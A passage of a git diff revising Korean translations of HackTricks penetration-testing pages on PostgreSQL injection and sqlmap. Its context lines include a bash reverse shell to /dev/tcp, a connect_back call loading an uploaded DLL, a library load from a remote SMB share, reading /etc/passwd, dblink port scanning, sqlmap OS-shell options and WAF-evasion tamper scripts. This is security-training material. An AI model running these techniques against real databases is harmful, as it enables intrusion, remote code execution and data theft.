+이 테이블 내에서 **전체 파일을 저장하기 위해** `pg_largeobject` 테이블에 객체를 생성해야 하며(LOID로 식별됨), 그 다음에 각 2KB 크기의 데이터 청크를 이 객체에 삽입해야 합니다. 이러한 청크는 내보내기 기능이 올바르게 작동하도록 보장하기 위해 정확히 2KB 크기여야 하며(마지막 청크는 예외일 수 있음) 중요합니다.
 
 **이진 데이터를** 2KB 청크로 나누기 위해 다음 명령을 실행할 수 있습니다:
 ```bash
@@ -15,7 +15,7 @@ split -b 2048 your_file # Creates 2KB sized files
 base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
 xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line
 ```
-**중요**: 이 프로세스를 자동화할 때, 2KB의 일반 텍스트 바이트 청크를 전송해야 합니다. Hex 인코딩된 파일은 크기가 두 배로 증가하기 때문에 청크당 4KB의 데이터가 필요하며, Base64 인코딩된 파일은 `ceil(n / 3) * 4` 공식을 따릅니다.
+**중요**: 이 프로세스를 자동화할 때, 2KB의 일반 텍스트 바이트 청크를 전송해야 합니다. Hex 인코딩된 파일은 크기가 두 배로 증가하므로 청크당 4KB의 데이터가 필요하며, Base64 인코딩된 파일은 `ceil(n / 3) * 4` 공식을 따릅니다.
 
 대용량 객체의 내용은 디버깅 목적으로 다음을 사용하여 볼 수 있습니다:
 ```sql
@@ -23,12 +23,12 @@ select loid, pageno, encode(data, 'escape') from pg_largeobject;
 ```
 #### Using `lo_creat` & Base64
 
-이진 데이터를 저장하기 위해 먼저 LOID가 생성됩니다:
+이진 데이터를 저장하기 위해, 먼저 LOID가 생성됩니다:
 ```sql
 SELECT lo_creat(-1);       -- Creates a new, empty large object
 SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID
 ```
-정확한 제어가 필요한 상황, 예를 들어 Blind SQL Injection을 악용할 때, `lo_create`는 고정된 LOID를 지정하는 데 선호됩니다.
+정확한 제어가 필요한 상황, 예를 들어 Blind SQL Injection을 악용할 때, `lo_create`는 고정 LOID를 지정하는 데 선호됩니다.
 
 데이터 청크는 다음과 같이 삽입할 수 있습니다:
 ```sql
@@ -48,7 +48,7 @@ SELECT lo_unlink(173454);  -- Deletes the specified large object
 select lo_import('/path/to/file');
 select lo_import('/path/to/file', 173454);
 ```
-객체 생성 후, 각 페이지에 데이터가 삽입되며, 각 청크는 2KB를 초과하지 않도록 보장됩니다:
+객체 생성 후, 각 페이지에 데이터가 삽입되며, 각 청크가 2KB를 초과하지 않도록 보장합니다:
 ```sql
 update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
 update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;
@@ -60,6 +60,6 @@ select lo_unlink(173454);  -- Deletes the specified large object
 ```
 ### 제한 사항
 
-**대형 객체는 ACL(Access Control Lists)을 가질 수 있으며**, 이는 사용자에 의해 생성된 객체에 대한 접근을 제한할 수 있습니다. 그러나 허용적인 ACL을 가진 오래된 객체는 여전히 콘텐츠 유출을 위해 접근할 수 있을 수 있습니다.
+**대형 객체는 ACL(Access Control Lists)을 가질 수 있으며**, 이는 사용자가 생성한 객체에 대한 접근을 제한할 수 있습니다. 그러나 허용적인 ACL을 가진 오래된 객체는 여전히 콘텐츠 유출을 위해 접근할 수 있을 수 있습니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
index 9b39af7e1..a8aae7963 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -16,10 +16,10 @@ dblink이 로드되면 몇 가지 흥미로운 트릭을 수행할 수 있습니
 ```
 local    all    all    trust
 ```
-_이 구성은 관리자가 비밀번호를 잊어버렸을 때 db 사용자의 비밀번호를 수정하는 데 일반적으로 사용되므로, 때때로 이를 발견할 수 있습니다._\
+_이 구성은 관리자가 비밀번호를 잊어버렸을 때 db 사용자 비밀번호를 수정하는 데 일반적으로 사용되므로, 때때로 이를 발견할 수 있습니다._\
 &#xNAN;_또한 pg_hba.conf 파일은 postgres 사용자 및 그룹만 읽을 수 있으며, postgres 사용자만 쓸 수 있습니다._
 
-이 경우는 **유용합니다** **이미** **쉘**이 피해자 내부에 있는 경우, postgresql 데이터베이스에 연결할 수 있게 해줍니다.
+이 경우는 **유용합니다** **이미** 피해자 내부에 **쉘**이 있는 경우로, postgresql 데이터베이스에 연결할 수 있게 해줍니다.
 
 또 다른 가능한 잘못된 구성은 다음과 같은 것입니다:
 ```
@@ -42,7 +42,7 @@ RETURNS (result1 TEXT, result2 TEXT);
 ```
 ### 포트 스캐닝
 
-`dblink_connect`를 악용하여 **열려 있는 포트를 검색**할 수 있습니다. 만약 그 **기능이 작동하지 않으면, 문서에 따르면 `dblink_connect_u()`는 `dblink_connect()`와 동일하지만, 비슈퍼유저가 어떤 인증 방법을 사용하여도 연결할 수 있도록 허용합니다**.
+`dblink_connect`를 악용하여 **열려 있는 포트를 검색**할 수 있습니다. 만약 그 **함수가 작동하지 않으면, 문서에 따르면 `dblink_connect_u()`는 `dblink_connect()`와 동일하지만, 비슈퍼유저가 어떤 인증 방법을 사용하여도 연결할 수 있도록 허용합니다**.
 ```sql
 SELECT * FROM dblink_connect('host=216.58.212.238
 port=443
@@ -69,7 +69,7 @@ DETAIL:  timeout expired
 ERROR:  could not establish connection
 DETAIL:  received invalid response to SSL negotiation:
 ```
-`dblink_connect` 또는 `dblink_connect_u`를 사용하기 전에 다음을 실행해야 할 수 있습니다:
+다음에 유의하세요: `dblink_connect` 또는 `dblink_connect_u`를 사용하기 전에 다음을 실행해야 할 수 있습니다:
 ```
 CREATE extension dblink;
 ```
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
index d2c379b04..5c8d508f0 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -13,7 +13,7 @@ lanname | lanacl
 ---------+---------
 plpgsql |
 ```
-기본적으로, **함수를 생성하는 것은 PUBLIC에게 부여된 권한입니다**, 여기서 PUBLIC은 해당 데이터베이스 시스템의 모든 사용자를 의미합니다. 이를 방지하기 위해 관리자는 PUBLIC 도메인에서 USAGE 권한을 철회해야 했을 것입니다:
+기본적으로, **함수를 생성하는 것은 PUBLIC에게 부여된 권한입니다**, 여기서 PUBLIC은 해당 데이터베이스 시스템의 모든 사용자를 의미합니다. 이를 방지하기 위해, 관리자는 PUBLIC 도메인에서 USAGE 권한을 철회해야 했을 것입니다:
 ```sql
 REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
 ```
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 5461fe7a8..140977b8b 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -4,7 +4,7 @@
 
 ## PostgreSQL Extensions
 
-PostgreSQL는 확장성을 핵심 기능으로 개발되어, 확장을 마치 내장 기능처럼 원활하게 통합할 수 있습니다. 이러한 확장은 본질적으로 C로 작성된 라이브러리로, 데이터베이스에 추가 기능, 연산자 또는 유형을 풍부하게 합니다.
+PostgreSQL는 확장성을 핵심 기능으로 개발되어, 마치 내장 기능처럼 확장을 원활하게 통합할 수 있습니다. 이러한 확장은 본질적으로 C로 작성된 라이브러리로, 데이터베이스에 추가 기능, 연산자 또는 유형을 풍부하게 합니다.
 
 버전 8.1부터는 확장 라이브러리에 대한 특정 요구 사항이 부과됩니다: 특별한 헤더로 컴파일되어야 합니다. 그렇지 않으면 PostgreSQL은 이를 실행하지 않으며, 호환 가능하고 잠재적으로 안전한 확장만 사용되도록 보장합니다.
 
@@ -28,7 +28,7 @@ CREATE OR REPLACE FUNCTION close(int) RETURNS int AS '/lib/libc.so.6', 'close' L
 
 <summary>Write binary file from base64</summary>
 
-Postgres에 이진 파일을 쓰려면 base64를 사용해야 할 수 있습니다. 이는 다음과 같은 경우에 유용합니다:
+Postgres에서 이진 파일을 작성하려면 base64를 사용해야 할 수 있습니다. 이는 다음과 같은 경우에 유용합니다:
 ```sql
 CREATE OR REPLACE FUNCTION write_to_file(file TEXT, s TEXT) RETURNS int AS
 $$
@@ -81,7 +81,7 @@ HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.
 > `PG_MODULE_MAGIC;`\
 > `#endif`
 
-PostgreSQL 8.2 버전 이후로 공격자가 시스템을 악용하는 과정이 더 어려워졌습니다. 공격자는 시스템에 이미 존재하는 라이브러리를 사용하거나 사용자 정의 라이브러리를 업로드해야 합니다. 이 사용자 정의 라이브러리는 호환되는 주요 버전의 PostgreSQL에 대해 컴파일되어야 하며 특정 "매직 블록"을 포함해야 합니다. 이 조치는 PostgreSQL 시스템을 악용하는 난이도를 크게 증가시키며, 시스템의 아키텍처와 버전 호환성에 대한 더 깊은 이해가 필요합니다.
+PostgreSQL 8.2 버전 이후로 공격자가 시스템을 악용하는 과정이 더 어려워졌습니다. 공격자는 시스템에 이미 존재하는 라이브러리를 사용하거나 사용자 정의 라이브러리를 업로드해야 합니다. 이 사용자 정의 라이브러리는 호환되는 PostgreSQL의 주요 버전에 대해 컴파일되어야 하며 특정 "매직 블록"을 포함해야 합니다. 이 조치는 PostgreSQL 시스템을 악용하는 난이도를 크게 증가시키며, 시스템의 아키텍처와 버전 호환성에 대한 더 깊은 이해가 필요합니다.
 
 #### 라이브러리 컴파일
 
@@ -119,7 +119,7 @@ CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAG
 SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
 #Notice the double single quotes are needed to scape the qoutes
 ```
-이 **라이브러리는 여러 다른 PostgreSQL 버전으로 미리 컴파일된** 것을 찾을 수 있으며, **이 프로세스를 자동화할 수 있습니다** (PostgreSQL 접근 권한이 있는 경우):
+이 **라이브러리는 미리 컴파일된** 여러 PostgreSQL 버전을 찾을 수 있으며, **이 프로세스를 자동화할 수 있습니다** (PostgreSQL 접근 권한이 있는 경우):
 
 {% embed url="https://github.com/Dionach/pgexec" %}
 
@@ -254,15 +254,15 @@ PG_RETURN_INT32(arg + 1);
 ```c
 CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
 ```
-[PolyUDF 프로젝트](https://github.com/rop-la/PolyUDF)는 전체 MS Visual Studio 프로젝트와 사용 준비가 완료된 라이브러리(_command eval_, _exec_ 및 _cleanup_ 포함)와 다중 버전 지원이 있는 좋은 출발점입니다.
+[PolyUDF 프로젝트](https://github.com/rop-la/PolyUDF)는 전체 MS Visual Studio 프로젝트와 사용 준비가 완료된 라이브러리(_command eval_, _exec_ 및 _cleanup_ 포함)와 다중 버전 지원이 있는 좋은 시작점입니다.
 
 ### 최신 PostgreSQL 버전에서의 RCE
 
-**최신 버전**의 PostgreSQL에서는 `superuser`가 특정 디렉토리(예: Windows의 `C:\Program Files\PostgreSQL\11\lib` 또는 \*nix 시스템의 `/var/lib/postgresql/11/lib`)에서만 공유 라이브러리 파일을 **로드하는 것이 금지**되었습니다. 이러한 디렉토리는 NETWORK_SERVICE 또는 postgres 계정에 의해 쓰기 작업이 **보호**됩니다.
+**최신 버전**의 PostgreSQL에서는 `superuser`가 특정 디렉토리(예: Windows의 `C:\Program Files\PostgreSQL\11\lib` 또는 \*nix 시스템의 `/var/lib/postgresql/11/lib`)에서만 공유 라이브러리 파일을 **로드하는 것**이 **금지**되었습니다. 이러한 디렉토리는 NETWORK_SERVICE 또는 postgres 계정에 의해 쓰기 작업이 **보호**됩니다.
 
-이러한 제한에도 불구하고 인증된 데이터베이스 `superuser`는 "대용량 객체"를 사용하여 파일 시스템에 **바이너리 파일을 쓸 수** 있습니다. 이 기능은 데이터베이스 작업(예: 테이블 업데이트 또는 생성)에 필수적인 `C:\Program Files\PostgreSQL\11\data` 디렉토리 내에서의 쓰기로 확장됩니다.
+이러한 제한에도 불구하고 인증된 데이터베이스 `superuser`는 "대용량 객체"를 사용하여 파일 시스템에 **바이너리 파일을 쓰는 것**이 가능합니다. 이 기능은 데이터베이스 작업(예: 테이블 업데이트 또는 생성)에 필수적인 `C:\Program Files\PostgreSQL\11\data` 디렉토리 내에서의 쓰기로 확장됩니다.
 
-중요한 취약점은 `CREATE FUNCTION` 명령에서 발생하며, 이는 데이터 디렉토리로의 **디렉토리 탐색을 허용**합니다. 따라서 인증된 공격자는 이 탐색을 **악용하여** 데이터 디렉토리에 공유 라이브러리 파일을 쓰고 이를 **로드**할 수 있습니다. 이 익스플로잇은 공격자가 임의의 코드를 실행할 수 있게 하여 시스템에서 네이티브 코드 실행을 달성하게 합니다.
+중요한 취약점은 `CREATE FUNCTION` 명령에서 발생하며, 이는 데이터 디렉토리로의 **디렉토리 탐색**을 **허용**합니다. 따라서 인증된 공격자는 이 탐색을 **악용하여** 데이터 디렉토리에 공유 라이브러리 파일을 쓰고 이를 **로드**할 수 있습니다. 이 익스플로잇은 공격자가 임의의 코드를 실행할 수 있게 하여 시스템에서 네이티브 코드 실행을 달성하게 합니다.
 
 #### 공격 흐름
 
@@ -272,7 +272,7 @@ CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\sha
 big-binary-files-upload-postgresql.md
 {{#endref}}
 
-확장 프로그램(poc.dll이라는 이름으로 이 예제에서)을 데이터 디렉토리에 업로드한 후 다음과 같이 로드할 수 있습니다:
+데이터 디렉토리에 확장자(poc.dll이라는 이름으로 이 예제에서)를 업로드한 후, 다음과 같이 로드할 수 있습니다:
 ```c
 create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;
 select connect_back('192.168.100.54', 1234);
@@ -280,8 +280,8 @@ select connect_back('192.168.100.54', 1234);
 _확장자를 `.dll`로 추가할 필요는 없습니다. create 함수가 이를 추가할 것입니다._
 
 자세한 정보는 **[원본 게시물을 여기에서 읽어보세요](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.\
-해당 게시물에서는 **postgres 확장을 생성하는 데 사용된** [**코드**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_postgres 확장을 컴파일하는 방법을 배우려면 이전 버전 중 하나를 읽어보세요_)가 제공되었습니다.\
-같은 페이지에서 이 **기술을 자동화하는** **익스플로잇**이 제공되었습니다:
+해당 게시물에서는 **postgres 확장을 생성하는 데 사용된** [**코드가 여기에 있습니다**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_postgres 확장을 컴파일하는 방법을 배우려면 이전 버전 중 하나를 읽어보세요_).\
+같은 페이지에서 이 **기술을 자동화하는** exploit이 제공되었습니다:
 ```python
 #!/usr/bin/env python3
 import sys
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
index b1d571cec..948ac557c 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
@@ -4,7 +4,7 @@
 
 ## PostgreSQL Languages
 
-당신이 접근할 수 있는 PostgreSQL 데이터베이스에는 **악용할 수 있는 다양한 스크립팅 언어가 설치되어** 있을 수 있으며, 이를 통해 **임의의 코드를 실행**할 수 있습니다.
+당신이 접근할 수 있는 PostgreSQL 데이터베이스에는 **악용할 수 있는 다양한 스크립팅 언어**가 설치되어 있을 수 있습니다. **임의의 코드를 실행**할 수 있습니다.
 
 당신은 **그들을 실행할 수 있습니다**:
 ```sql
@@ -41,7 +41,7 @@ PostgreSQL에 설치할 수 있는 대부분의 스크립팅 언어는 **2가지
 > CREATE EXTENSION plrubyu;
 > ```
 
-안전한 버전을 "불안전한" 것으로 컴파일하는 것이 가능하다는 점에 유의하세요. 예를 들어 [**이것**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html)을 확인하세요. 따라서 **신뢰할 수 있는** 것만 설치되어 있더라도 코드를 실행할 수 있는지 시도해 볼 가치가 항상 있습니다.
+안전한 버전을 "불안전한" 것으로 컴파일할 수 있다는 점에 유의하세요. 예를 들어 [**이것**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html)을 확인하세요. 따라서 **신뢰할 수 있는** 것만 설치되어 있더라도 코드를 실행할 수 있는지 시도해 볼 가치가 항상 있습니다.
 
 ## plpythonu/plpython3u
 
@@ -240,7 +240,7 @@ select read('/etc/passwd'); #Read a file in b64
 ```
 {{#endtab}}
 
-{{#tab name="권한 얻기"}}
+{{#tab name="Get perms"}}
 ```sql
 CREATE OR REPLACE FUNCTION get_perms (path text)
 RETURNS VARCHAR(65535) stable
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index d68d87e42..1989cfb94 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -85,7 +85,7 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
 #Dropping a reverse-shell / meterpreter
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
 ```
-## SQLmap으로 웹사이트 크롤링 및 자동 익스플로잇
+## SQLmap로 웹사이트 크롤링 및 자동 익스플로잇
 ```bash
 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
 
@@ -120,31 +120,31 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | appendnullbyte.py            | 페이로드 끝에 인코딩된 NULL 바이트 문자를 추가합니다.                                                                          |
 | base64encode.py              | 주어진 페이로드의 모든 문자를 Base64로 인코딩합니다.                                                                               |
 | between.py                   | '>' 연산자를 'NOT BETWEEN 0 AND #'로 대체합니다.                                                                                  |
-| bluecoat.py                  | SQL 문장 뒤의 공백 문자를 유효한 무작위 공백 문자로 대체합니다. 이후 '=' 문자를 LIKE 연산자로 대체합니다. |
+| bluecoat.py                  | SQL 문장 뒤의 공백 문자를 유효한 무작위 공백 문자로 대체합니다. 이후 '=' 문자를 LIKE 연산자로 대체합니다.                     |
 | chardoubleencode.py          | 주어진 페이로드의 모든 문자를 이중 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음).                                            |
 | commalesslimit.py            | 'LIMIT M, N'과 같은 인스턴스를 'LIMIT N OFFSET M'으로 대체합니다.                                                               |
-| commalessmid.py              | 'MID(A, B, C)'와 같은 인스턴스를 'MID(A FROM B FOR C)'로 대체합니다.                                                              |
+| commalessmid.py              | 'MID(A, B, C)'와 같은 인스턴스를 'MID(A FROM B FOR C)'로 대체합니다.                                                            |
 | concat2concatws.py           | 'CONCAT(A, B)'와 같은 인스턴스를 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'로 대체합니다.                                          |
-| charencode.py                | 주어진 페이로드의 모든 문자를 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음).                                                   |
+| charencode.py                | 주어진 페이로드의 모든 문자를 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음).                                               |
 | charunicodeencode.py         | 주어진 페이로드의 비인코딩 문자를 유니코드 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음). "%u0022"                         |
 | charunicodeescape.py         | 주어진 페이로드의 비인코딩 문자를 유니코드 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음). "\u0022"                         |
 | equaltolike.py               | '=' 연산자의 모든 발생을 'LIKE' 연산자로 대체합니다.                                                                             |
-| escapequotes.py              | 슬래시로 아포스트로피(')와 큰따옴표(")를 이스케이프합니다.                                                                        |
+| escapequotes.py              | 슬래시로 인용부호('와 ")를 이스케이프합니다.                                                                                      |
 | greatest.py                  | '>' 연산자를 'GREATEST' 대응 문자로 대체합니다.                                                                                  |
 | halfversionedmorekeywords.py | 각 키워드 앞에 버전이 있는 MySQL 주석을 추가합니다.                                                                               |
 | ifnull2ifisnull.py           | 'IFNULL(A, B)'와 같은 인스턴스를 'IF(ISNULL(A), B, A)'로 대체합니다.                                                            |
 | modsecurityversioned.py      | 전체 쿼리를 버전이 있는 주석으로 감쌉니다.                                                                                         |
 | modsecurityzeroversioned.py  | 전체 쿼리를 제로 버전 주석으로 감쌉니다.                                                                                          |
-| multiplespaces.py            | SQL 키워드 주위에 여러 개의 공백을 추가합니다.                                                                                     |
+| multiplespaces.py            | SQL 키워드 주위에 여러 개의 공백을 추가합니다.                                                                                   |
 | nonrecursivereplacement.py   | 미리 정의된 SQL 키워드를 대체에 적합한 표현으로 대체합니다(예: .replace("SELECT", "") 필터).                                   |
 | percentage.py                | 각 문자 앞에 백분율 기호('%')를 추가합니다.                                                                                       |
 | overlongutf8.py              | 주어진 페이로드의 모든 문자를 변환합니다(이미 인코딩된 것은 처리하지 않음).                                                      |
 | randomcase.py                | 각 키워드 문자를 무작위 대소문자 값으로 대체합니다.                                                                             |
 | randomcomments.py            | SQL 키워드에 무작위 주석을 추가합니다.                                                                                           |
 | securesphere.py              | 특별히 제작된 문자열을 추가합니다.                                                                                                 |
-| sp_password.py               | 페이로드 끝에 'sp_password'를 추가하여 DBMS 로그에서 자동으로 난독화합니다.                                                     |
+| sp_password.py               | 페이로드 끝에 'sp_password'를 추가하여 DBMS 로그에서 자동으로 난독화합니다.                                                    |
 | space2comment.py             | 공백 문자(' ')를 주석으로 대체합니다.                                                                                             |
-| space2dash.py                | 공백 문자(' ')를 대시 주석('--')으로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                         |
+| space2dash.py                | 공백 문자(' ')를 대시 주석('--')으로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                        |
 | space2hash.py                | 공백 문자(' ')를 파운드 문자('#')로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                         |
 | space2morehash.py            | 공백 문자(' ')를 파운드 문자('#')로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                         |
 | space2mssqlblank.py          | 공백 문자(' ')를 유효한 대체 문자 집합에서 무작위 공백 문자로 대체합니다.                                                       |
@@ -153,7 +153,7 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | space2mysqldash.py           | 공백 문자(' ')를 대시 주석('--')으로 대체하고 새 줄('\n')을 추가합니다.                                                        |
 | space2plus.py                | 공백 문자(' ')를 더하기 기호('+')로 대체합니다.                                                                                   |
 | space2randomblank.py         | 공백 문자(' ')를 유효한 대체 문자 집합에서 무작위 공백 문자로 대체합니다.                                                       |
-| symboliclogical.py           | AND 및 OR 논리 연산자를 그들의 기호 대응 문자로 대체합니다. \(&& 및                                                             |
+| symboliclogical.py           | AND 및 OR 논리 연산자를 그들의 기호 대응 문자로 대체합니다(&& 및                                                               |
 | unionalltounion.py           | UNION ALL SELECT를 UNION SELECT로 대체합니다.                                                                                     |
 | unmagicquotes.py             | 인용 문자(')를 다중 바이트 조합 %bf%27로 대체하고 끝에 일반 주석을 추가합니다(작동하게 하기 위해).                               |
 | uppercase.py                 | 각 키워드 문자를 대문자 값 'INSERT'로 대체합니다.                                                                               |
diff --git a/src/pentesting-web/sql-injection/sqlmap/README.md b/src/pentesting-web/sql-injection/sqlmap/README.md
index 3f105dbbb..afeba2640 100644
--- a/src/pentesting-web/sql-injection/sqlmap/README.md
+++ b/src/pentesting-web/sql-injection/sqlmap/README.md
@@ -75,13 +75,13 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 
 #The injection is located at the '*'
 ```
-### 주입이 성공했을 때 문자열 표시
+### 인젝션이 성공했을 때 문자열 표시
 ```bash
 --string="string_showed_when_TRUE"
 ```
 ### Eval
 
-**Sqlmap**는 `-e` 또는 `--eval`을 사용하여 각 페이로드를 전송하기 전에 일부 파이썬 원라이너로 처리할 수 있습니다. 이를 통해 페이로드를 전송하기 전에 사용자 정의 방식으로 쉽게 빠르게 처리할 수 있습니다. 다음 예제에서 **flask cookie session** **은 전송하기 전에 알려진 비밀로 flask에 의해 서명됩니다**:
+**Sqlmap**는 `-e` 또는 `--eval`을 사용하여 각 페이로드를 전송하기 전에 일부 파이썬 원라이너로 처리할 수 있습니다. 이를 통해 페이로드를 전송하기 전에 사용자 정의 방식으로 쉽게 빠르게 처리할 수 있습니다. 다음 예제에서 **flask 쿠키 세션** **은 전송하기 전에 알려진 비밀로 flask에 의해 서명됩니다**:
 ```bash
 sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
 ```
@@ -125,7 +125,7 @@ python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
 ```
-### 불리언 인젝션 찾기 도움
+### 부울 주입 찾기 도움
 ```bash
 # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
 sqlmap -r r.txt -p id --not-string ridiculous --batch
@@ -146,9 +146,9 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | between.py                   | '>' 연산자를 'NOT BETWEEN 0 AND #'로 대체합니다.                                                                                   |
 | bluecoat.py                  | SQL 문 뒤의 공백 문자를 유효한 무작위 공백 문자로 대체합니다. 이후 문자를 LIKE 연산자로 대체합니다.                                   |
 | chardoubleencode.py          | 주어진 페이로드의 모든 문자를 이중 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음).                                               |
-| commalesslimit.py            | 'LIMIT M, N'과 같은 인스턴스를 'LIMIT N OFFSET M'으로 대체합니다.                                                                  |
-| commalessmid.py              | 'MID(A, B, C)'와 같은 인스턴스를 'MID(A FROM B FOR C)'로 대체합니다.                                                              |
-| concat2concatws.py           | 'CONCAT(A, B)'와 같은 인스턴스를 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'로 대체합니다.                                              |
+| commalesslimit.py            | 'LIMIT M, N'과 같은 인스턴스를 'LIMIT N OFFSET M'으로 대체합니다.                                                                |
+| commalessmid.py              | 'MID(A, B, C)'와 같은 인스턴스를 'MID(A FROM B FOR C)'로 대체합니다.                                                             |
+| concat2concatws.py           | 'CONCAT(A, B)'와 같은 인스턴스를 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'로 대체합니다.                                             |
 | charencode.py                | 주어진 페이로드의 모든 문자를 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음).                                                  |
 | charunicodeencode.py         | 주어진 페이로드의 비인코딩 문자를 유니코드 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음). "%u0022"                             |
 | charunicodeescape.py         | 주어진 페이로드의 비인코딩 문자를 유니코드 URL 인코딩합니다(이미 인코딩된 것은 처리하지 않음). "\u0022"                             |
@@ -158,8 +158,8 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | halfversionedmorekeywords.py | 각 키워드 앞에 버전이 있는 MySQL 주석을 추가합니다.                                                                                 |
 | ifnull2ifisnull.py           | 'IFNULL(A, B)'와 같은 인스턴스를 'IF(ISNULL(A), B, A)'로 대체합니다.                                                              |
 | modsecurityversioned.py      | 버전이 있는 주석으로 전체 쿼리를 감쌉니다.                                                                                           |
-| modsecurityzeroversioned.py  | 제로 버전 주석으로 전체 쿼리를 감쌉니다.                                                                                             |
-| multiplespaces.py            | SQL 키워드 주위에 여러 개의 공백을 추가합니다.                                                                                       |
+| modsecurityzeroversioned.py  | 제로 버전 주석으로 전체 쿼리를 감쌉니다.                                                                                           |
+| multiplespaces.py            | SQL 키워드 주위에 여러 개의 공백을 추가합니다.                                                                                      |
 | nonrecursivereplacement.py   | 미리 정의된 SQL 키워드를 대체에 적합한 표현으로 대체합니다(예: .replace("SELECT", "") 필터).                                        |
 | percentage.py                | 각 문자 앞에 백분율 기호('%')를 추가합니다.                                                                                         |
 | overlongutf8.py              | 주어진 페이로드의 모든 문자를 변환합니다(이미 인코딩된 것은 처리하지 않음).                                                        |
@@ -168,13 +168,13 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | securesphere.py              | 특별히 제작된 문자열을 추가합니다.                                                                                                   |
 | sp_password.py               | DBMS 로그에서 자동으로 난독화하기 위해 페이로드 끝에 'sp_password'를 추가합니다.                                                  |
 | space2comment.py             | 공백 문자(' ')를 주석으로 대체합니다.                                                                                               |
-| space2dash.py                | 공백 문자(' ')를 무작위 문자열과 새 줄('\n')이 뒤따르는 대시 주석('--')으로 대체합니다.                                           |
-| space2hash.py                | 공백 문자(' ')를 무작위 문자열과 새 줄('\n')이 뒤따르는 파운드 문자('#')로 대체합니다.                                            |
-| space2morehash.py            | 공백 문자(' ')를 무작위 문자열과 새 줄('\n')이 뒤따르는 파운드 문자('#')로 대체합니다.                                            |
+| space2dash.py                | 공백 문자(' ')를 대시 주석('--')으로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                          |
+| space2hash.py                | 공백 문자(' ')를 파운드 문자('#')로 대체하고 무작위 문자열과 새 줄('\n')을 추가합니다.                                           |
